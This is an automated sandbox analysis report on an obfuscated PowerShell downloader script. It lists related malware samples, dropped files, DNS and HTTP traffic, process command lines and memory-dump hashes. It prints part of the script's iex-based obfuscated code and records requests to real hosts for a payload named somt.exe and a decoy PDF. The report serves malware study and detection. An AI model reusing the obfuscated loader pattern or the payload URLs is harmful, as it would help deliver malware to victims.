                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                  • 103.14.247.60
                                  na.elfGet hashmaliciousGafgytBrowse
                                  • 103.14.247.29
                                  na.elfGet hashmaliciousGafgytBrowse
                                  • 103.14.247.60
                                  jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  • 103.14.247.64
                                  IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  • 103.14.247.58
                                  wget.elfGet hashmaliciousGafgytBrowse
                                  • 103.14.247.62
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0e1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                  • 103.120.48.75
                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                  • 103.120.48.75
                                  BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  O9MV0lNEO5.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  RegAsm.exeGet hashmaliciousQuasarBrowse
                                  • 103.120.48.75
                                  No context
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1628158735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllul5mxllp:NllU4x/
                                  MD5:3A925CB766CE4286E251C26E90B55CE8
                                  SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                  SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                  SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6224
                                  Entropy (8bit):3.7300608898885894
                                  Encrypted:false
                                  SSDEEP:48:RSD9l+tgc43CyuU2UGQukvhkvklCywqQe9XlHJQSogZoewe9XlwQSogZoa1:YPc43CQTekvhkvCCtTe9XxHQe9XCHx
                                  MD5:A9780F15E52C6BD46A09C5D545C20361
                                  SHA1:C839E0919092526117742D847E0BF62B7D6A8379
                                  SHA-256:F0197B8F3340BF628D5A676593D83B8C49E8314A3F2A7FE2739E8090A50158D1
                                  SHA-512:A117643D7303E3A4380BC7191478E24EF2E607FC0A75158D227F44BACBF206C4FC66C708EA67176EFA35605445E0D636BBCAFAA0F9A83DD9ED345AEF45B70582
                                  Malicious:false
                                  Reputation:low
                                  Preview:...................................FL..................F.".. ...J.S...@..&.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...p'7".R...-.&.R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y\]...........................^.A.p.p.D.a.t.a...B.V.1......YZ]..Roaming.@......EW<2.YZ]..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YW]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YW]....2.....................OJ..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YW]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YW]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y`]....u...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6224
                                  Entropy (8bit):3.7300608898885894
                                  Encrypted:false
                                  SSDEEP:48:RSD9l+tgc43CyuU2UGQukvhkvklCywqQe9XlHJQSogZoewe9XlwQSogZoa1:YPc43CQTekvhkvCCtTe9XxHQe9XCHx
                                  MD5:A9780F15E52C6BD46A09C5D545C20361
                                  SHA1:C839E0919092526117742D847E0BF62B7D6A8379
                                  SHA-256:F0197B8F3340BF628D5A676593D83B8C49E8314A3F2A7FE2739E8090A50158D1
                                  SHA-512:A117643D7303E3A4380BC7191478E24EF2E607FC0A75158D227F44BACBF206C4FC66C708EA67176EFA35605445E0D636BBCAFAA0F9A83DD9ED345AEF45B70582
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...J.S...@..&.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...p'7".R...-.&.R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y\]...........................^.A.p.p.D.a.t.a...B.V.1......YZ]..Roaming.@......EW<2.YZ]..../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YW]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YW]....2.....................OJ..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YW]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YW]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y`]....u...........
                                  File type:ASCII text, with very long lines (839), with no line terminators
                                  Entropy (8bit):5.388689957782501
                                  TrID:
                                    File name:fs8cRx6Us2.ps1
                                    File size:839 bytes
                                    MD5:9b4d04c52a79f4cc6c57581af89e85ac
                                    SHA1:64b280596aa3f0a85dbfef6cccc6aed0e5b0df19
                                    SHA256:f6e3224ac56171410ae0747b40a0be74bc0eab03f4200c215f60c75bcf1df84d
                                    SHA512:5e9ed4837602f251cb40c7dd195f6f03d6892bb43a06461210933dc74bf271ad6f1a9276c48a9037155eefa1b9871d24d5055094fe991f5ef7fc63c82a3cdda9
                                    SSDEEP:24:eKslLKTLeWICz8LtO74Evo79kLWAa6W9zmt8:2eI+c/goWxqza8
                                    TLSH:DB01128A26A645F3D050B56634C18C3FB277D905A5D604F1A5F54157307CE3D0DC2D3B
                                    File Content Preview:$flol3=iex($('[Environment]::GetEwz7t'''.Replace('wz7','nvironmentVariable(''public'') + ''\\v8qb8y.ba')));$flol=iex($('[Environment]::GetEwz7t'''.Replace('wz7','nvironmentVariable(''public'') + ''\\u8im.ba')));function getit([string]$fz, [string]$oulv){$
                                    Icon Hash:3270d6baae77db44
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 19, 2024 12:43:02.500153065 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:02.500195026 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:02.500288010 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:02.513638973 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:02.513657093 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:03.825361013 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:03.825455904 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:03.831497908 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:03.831522942 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:03.831826925 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:03.846893072 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:03.891333103 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:04.295193911 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:04.295267105 CET44349708103.120.48.75192.168.2.6
                                    Dec 19, 2024 12:43:04.295337915 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:04.299768925 CET49708443192.168.2.6103.120.48.75
                                    Dec 19, 2024 12:43:05.137387991 CET4970980192.168.2.6203.175.174.69
                                    Dec 19, 2024 12:43:05.256884098 CET8049709203.175.174.69192.168.2.6
                                    Dec 19, 2024 12:43:05.257378101 CET4970980192.168.2.6203.175.174.69
                                    Dec 19, 2024 12:43:05.257502079 CET4970980192.168.2.6203.175.174.69
                                    Dec 19, 2024 12:43:05.376944065 CET8049709203.175.174.69192.168.2.6
                                    Dec 19, 2024 12:43:06.860152006 CET8049709203.175.174.69192.168.2.6
                                    Dec 19, 2024 12:43:06.904818058 CET4970980192.168.2.6203.175.174.69
                                    Dec 19, 2024 12:43:06.915024996 CET4970980192.168.2.6203.175.174.69
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 19, 2024 12:43:01.966480970 CET6142253192.168.2.61.1.1.1
                                    Dec 19, 2024 12:43:02.491228104 CET53614221.1.1.1192.168.2.6
                                    Dec 19, 2024 12:43:04.301791906 CET6287453192.168.2.61.1.1.1
                                    Dec 19, 2024 12:43:04.543147087 CET53628741.1.1.1192.168.2.6
                                    Dec 19, 2024 12:43:04.911109924 CET5168853192.168.2.61.1.1.1
                                    Dec 19, 2024 12:43:05.136255980 CET53516881.1.1.1192.168.2.6
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 19, 2024 12:43:01.966480970 CET192.168.2.61.1.1.10x8ccStandard query (0)www.alramsyadvocates.comA (IP address)IN (0x0001)false
                                    Dec 19, 2024 12:43:04.301791906 CET192.168.2.61.1.1.10xf8b3Standard query (0)alramsyadvocates.comA (IP address)IN (0x0001)false
                                    Dec 19, 2024 12:43:04.911109924 CET192.168.2.61.1.1.10x1266Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 19, 2024 12:43:02.491228104 CET1.1.1.1192.168.2.60x8ccNo error (0)www.alramsyadvocates.comalramsyadvocates.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 19, 2024 12:43:02.491228104 CET1.1.1.1192.168.2.60x8ccNo error (0)alramsyadvocates.com103.120.48.75A (IP address)IN (0x0001)false
                                    Dec 19, 2024 12:43:04.543147087 CET1.1.1.1192.168.2.60xf8b3No error (0)alramsyadvocates.com103.120.48.75A (IP address)IN (0x0001)false
                                    Dec 19, 2024 12:43:05.136255980 CET1.1.1.1192.168.2.60x1266No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                    • www.alramsyadvocates.com
                                    • www.bluemaxxlaser.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649709203.175.174.69806736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 19, 2024 12:43:05.257502079 CET123OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                    Host: www.bluemaxxlaser.com
                                    Connection: Keep-Alive
                                    Dec 19, 2024 12:43:06.860152006 CET516INHTTP/1.1 404 Not Found
                                    Date: Thu, 19 Dec 2024 11:43:06 GMT
                                    Server: Apache
                                    Content-Length: 315
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649708103.120.48.754436736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-19 11:43:03 UTC86OUTGET /new/somt.exe HTTP/1.1
                                    Host: www.alramsyadvocates.com
                                    Connection: Keep-Alive
                                    2024-12-19 11:43:04 UTC225INHTTP/1.1 301 Moved Permanently
                                    Date: Thu, 19 Dec 2024 11:43:03 GMT
                                    Server: Apache
                                    Location: https://alramsyadvocates.com/new/somt.exe
                                    Content-Length: 249
                                    Connection: close
                                    Content-Type: text/html; charset=iso-8859-1
                                    2024-12-19 11:43:04 UTC249INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 72 61 6d 73 79 61 64 76 6f 63 61 74 65 73 2e 63 6f 6d 2f 6e 65 77 2f 73 6f 6d 74 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://alramsyadvocates.com/new/somt.exe">here</a>.</p></body></html>


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:06:42:58
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1"
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:06:42:58
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2274250491.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34610000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8660b8f5f2e4a6e864ed6b386364c3e4624db944e0196c02dac059e9632f7f9a
                                      • Instruction ID: ec041514415947b44b83f0d9a685b65a126632d3022bfda56ee87b6f4c9b9f40
                                      • Opcode Fuzzy Hash: 8660b8f5f2e4a6e864ed6b386364c3e4624db944e0196c02dac059e9632f7f9a
                                      • Instruction Fuzzy Hash: FCD1F522B0DB960FE79A9A2858A62F57BD1EF4B310F4801BED18DC71D3DD1DA806D342
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2274250491.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34610000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd1ef779d63d608379b35888b593c13748fca0e00d6db06c6ecc70169c4f703c
                                      • Instruction ID: 3b1cb4f65ef1c5d95ce5c78bfa5c7b4a09292d400c71df945983a8efee7d9652
                                      • Opcode Fuzzy Hash: bd1ef779d63d608379b35888b593c13748fca0e00d6db06c6ecc70169c4f703c
                                      • Instruction Fuzzy Hash: 6421E722F1DF9A0BE3A99E2C54B52F462C2EF9AB50B5801BAD25DC71D3DD1DEC01E241
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2274250491.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34610000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d2d849d763f39f24e9cb904a506632fb5d9afb04a6bacc6e724920c76ada7f4
                                      • Instruction ID: de826e508c8132cc23aa5cba3afda5fd5f7e876c982cfd298acdc2fd021f8e8b
                                      • Opcode Fuzzy Hash: 2d2d849d763f39f24e9cb904a506632fb5d9afb04a6bacc6e724920c76ada7f4
                                      • Instruction Fuzzy Hash: 8911E031B0D6994FEB55DFA890A41F87BE2EF4A311B1400BEC54DDB193DA29A841D311
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: ab971d81a0382a8ef7f6632f9b66d3bf19d05de7121d89cac3d07bd3aac78c9d
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: 5901A77020CB0C4FD744EF0CE051AA6B7E0FB95324F10052DE58AC3661D736E882CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$4
                                      • API String ID: 0-209682765
                                      • Opcode ID: 4ebce70913a4cbf04a473e048fbc0b3599a4d3ef6f39fd46128b895158d58a23
                                      • Instruction ID: fa8f4b98282bbea722b1e3e1d0cfa5f56827e70a4e20c23a28a50e60aaf38fb8
                                      • Opcode Fuzzy Hash: 4ebce70913a4cbf04a473e048fbc0b3599a4d3ef6f39fd46128b895158d58a23
                                      • Instruction Fuzzy Hash: B3416487F0EBD25AE653576C6CF63D67FD0EF532A570900B7C384C91A3A90D680AA391
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4
                                      • API String ID: 0-4088798008
                                      • Opcode ID: 3f15a026a6ee203c1ac701a4af644053e2aa03078233cae8fa689923799c579c
                                      • Instruction ID: 31b0e477fe050cb16dd52cc855aa7fd4c350c7e3f4c6290d4b365733b6c03f94
                                      • Opcode Fuzzy Hash: 3f15a026a6ee203c1ac701a4af644053e2aa03078233cae8fa689923799c579c
                                      • Instruction Fuzzy Hash: C642D452F0E7925FE767976898F52E53B90EF63364B0800BBC289CF1A3E91D78069351
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 126025f03ee2f84a1c92897ec927501499f072e0fd855b17440a2f81f8d776d0
                                      • Instruction ID: 8dbd2c39cfd4c5505df3b67208e7c8dba1bf54c5a79c3b387da1cf9148ed30b6
                                      • Opcode Fuzzy Hash: 126025f03ee2f84a1c92897ec927501499f072e0fd855b17440a2f81f8d776d0
                                      • Instruction Fuzzy Hash: 5612A163F0E7D35FF753566858F60E53FA0EF63265B4900B7C298CE1A3D90C6816A261
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef126a3458db92c15f61813d7085e9ea76046d96f1974de7d80bbf9fdd3efea5
                                      • Instruction ID: 070c3ba8016756e98fbf4cdedd43b97e3c6c50b438da0225ebeddf19dcfe59de
                                      • Opcode Fuzzy Hash: ef126a3458db92c15f61813d7085e9ea76046d96f1974de7d80bbf9fdd3efea5
                                      • Instruction Fuzzy Hash: 8DC18547F0D5A61BF6667BAC68F51EA7B90DF533B670D01B3D388CD1939C0C680A52A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2274250491.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34610000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ab6a79921ee025677992ac1ee13889de9259f76238cfe6eeaad8822a8fdbb52
                                      • Instruction ID: c93bcedc0eec42d6de21d420909174771449bbae439b18e4ee37ccf3101e4b21
                                      • Opcode Fuzzy Hash: 1ab6a79921ee025677992ac1ee13889de9259f76238cfe6eeaad8822a8fdbb52
                                      • Instruction Fuzzy Hash: 0B81E322A4E7D50FE7639B7858651E13FE1DF97220B0900FBD18ACB1A3D90D9C4AC392
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2273913273.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c4e4939fd42f4aab49f12c0963c5ff484e70c1aaacc9929ca3fe50e6100a4d2
                                      • Instruction ID: 12fb8bee57079f566c038e7b0273846b178be97345138f7da5d401aa7050ea46
                                      • Opcode Fuzzy Hash: 0c4e4939fd42f4aab49f12c0963c5ff484e70c1aaacc9929ca3fe50e6100a4d2
                                      • Instruction Fuzzy Hash: 8E71A467F0D7E21FF713966C68B60DA3FA0EF5326470A00F7D584CE1A3E91C6846A261